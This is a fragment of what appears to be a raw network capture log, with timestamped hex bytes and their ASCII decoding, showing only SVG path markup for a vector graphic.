                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11771INData Raw: 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                                          Data Ascii: 9,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><pa
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11787INData Raw: 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 30 35 2c 38 36 2e 36 34
                                                                                                                                                                                                                                                                          Data Ascii: 1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.05,86.64
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11803INData Raw: 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2c 31 36 32 2e 37 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c
                                                                                                                                                                                                                                                                          Data Ascii: 6,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644,162.74a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11819INData Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2c 32 33 38 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: "/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M678,238.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11835INData Raw: 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c 39 39 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,99.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11851INData Raw: 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: 1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"/><path class="
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12380INData Raw: 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 34 39 2c 32 34 33 2e 36 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39
                                                                                                                                                                                                                                                                          Data Ascii: 22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.49,243.64a1.92,1.92,0,0,1-.87,2.49
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12396INData Raw: 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: .13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12412INData Raw: 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                                                                                                                          Data Ascii: -4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12428INData Raw: 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2c 33 37 33 61 32 2e 31 36
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M723,373a2.16
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12444INData Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 2c 34 33 34 2e 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M757.7,434.08a2.15,2.15,0,0,1-1.09,2.75,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12460INData Raw: 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 38 2c 32 35 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.78,252a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12476INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 35 31 2c 33 31 33 2e 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37
                                                                                                                                                                                                                                                                          Data Ascii: ath class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.51,313.1a2.15,2.15,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12492INData Raw: 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 32 35 2c 33 37 34 2e 31 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: "M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M855.25,374.18a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12508INData Raw: 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                                          Data Ascii: .1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.63,2.63,0,0,1,0,3.57"/><pat
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12524INData Raw: 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 39 31 37 2c 32 35 36 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.15,0,0,1,917,256a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12540INData Raw: 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9
